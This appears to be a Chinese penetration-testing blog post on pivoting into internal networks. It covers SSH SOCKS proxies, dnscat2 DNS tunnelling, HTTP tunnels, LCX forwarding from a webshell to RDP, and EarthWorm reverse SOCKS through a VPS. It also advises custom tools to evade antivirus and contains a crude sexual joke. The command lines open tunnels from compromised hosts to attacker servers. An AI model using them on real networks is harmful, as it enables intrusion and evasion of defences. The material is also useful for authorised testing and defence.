首先，SSH 端口转发自然需要 SSH 连接，而 SSH 连接是有方向的，从 SSH Client 到 SSH Server 。而我们的应用也是有方向的，比如需要连接远程桌面时，远程桌面自然就是 Server 端，我们应用连接的方向也是从应用的 Client 端连接到应用的 Server 端。如果这两个连接的方向一致，那我们就说它是本地转发。而如果两个方向不一致，我们就说它是远程转发。

总的思路是通过将 TCP 连接转发到 SSH 通道上以解决数据加密以及突破防火墙的种种限制。对一些已知端口号的应用，例如 Telnet/LDAP/SMTP，我们可以使用本地端口转发或者远程端口转发来达到目的。

如果你对ssh转发还有问题的话，推荐阅读以下文章

• SSH隧道与端口转发及内网穿透
• 实战 SSH 端口转发
• 玩转SSH端口转发

ssh架设socks代理

client

ssh -qTfnN -D 1080 172.16.1.141

client上架设socks，端口1080，数据通过attacker转发到内网。

dnscat2

dnscat2 是一款基于 DNS 协议的代理隧道。不仅支持端口转发，另外还有执行命令，文件传输等功能。其原理与 DNS Log 类似, 分为直连和中继两种模式, 前者直接连接服务端的 53 端口, 速度快, 但隐蔽性差, 后者通过对所设置域名的递归查询进行数据传输, 速度慢, 但隐蔽性好。

创建一条端口转发

(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command (LAPTOP) 1> listen 1234 127.0.0.1:3389
Listening on 0.0.0.0:1234, sending connections to 127.0.0.1:3389
command (LAPTOP) 1> 

这个我没有测试，这个参考 @X1r0z 的文章 dnscat2 tunnel

至于更多用法请参阅 README.MD

HTTP/HTTPS隧道

http隧道较为简单，在这里举几个有名的http隧道（或是基于http包装的tcp隧道）

1. https://github.com/sensepost/reGeorg
2. https://github.com/nccgroup/ABPTTS 目前不支持PHP
3. https://github.com/SECFORCE/Tunna
4. https://github.com/sensepost/reDuh

如何使用socks代理？

1. shadowsocks
2. sockcap64 windows
3. Proxifier
4. proxychains

踩过的坑

1. win2008 远程桌面黑屏鼠标没反应可能是因为你登录的用户已经登录了。
2. 连不上3389需要先关防火墙。
3. socat尽量用fork，不然一次会话结束后就会断。

写在文后

文章中的很多东西网上都有，端口转发实际上只要明白原理和数据的流向，就很明了了。

但是对于杀软来说，像lcx这种工具传上去就被杀掉了，所以推荐golang自写端口转发工具，当然你也可以在GitHub找一些少见的自写的端口转发工具来规避杀软。比如https://github.com/tavenli/port-forward

参考链接：

• https://micro8.gitbook.io/micro8/contents#91-100-ke
• SSH隧道与端口转发及内网穿透
• 实战 SSH 端口转发
• 玩转SSH端口转发
• socat 使用手册
• Web狗要懂的内网端口转发
• 内网端口转发及穿透

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

LCX弹个shell

LCX 端口转发（突破内网不能连接）
Webshell执行
-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransPort>
-slave 外网IP 外网IP监听端口 127.0.0.1 远程桌面端口

外网（服务器）执行
-listen 51 3333 监听51端口并转发到3333端口

然后外网服务器直接mstsc链接127.0.0.1:3333即可访问内网webshell

EarthWorm

EW 是一套便携式的网络穿透工具, 具有 SOCKS v5服务架设和端口转发两大核心功能, 可在复杂网络环境下完成网络穿透.

一般进入内网有 正向代理 和 反向代理 两种方法

引用 redrain 大牛的话

正向代理是我们自己 (Lhost) 戴套 (proxy) 插进去, 反向代理是她 (Rhost) 主动通过上位 (proxy) 坐上来 (Lhost)

正向代理需要目标主机有公网 IP 反向代理则适用于被防火墙拦截的情况

正向代理

目标主机

ew -s ssocksd -l 1080

在本地架设 socks 5 服务器 监听 1080 端口

socks 客户端 Proxifier (windows) proxychains (linux)

连接成功后 显示信息

ping 通了目标主机的另外一块网卡

反向代理

vps

ew -s rcsocks -l 1080 -e 8888

将来自 8888 端口的请求转发至 1080 端口

目标主机

ew -s rssocks -d ip -e 8888

连接指定 ip 并将数据转发至 8888 端口

成功后会提示 rssocks cmd_socket ok

同样 ping 通网卡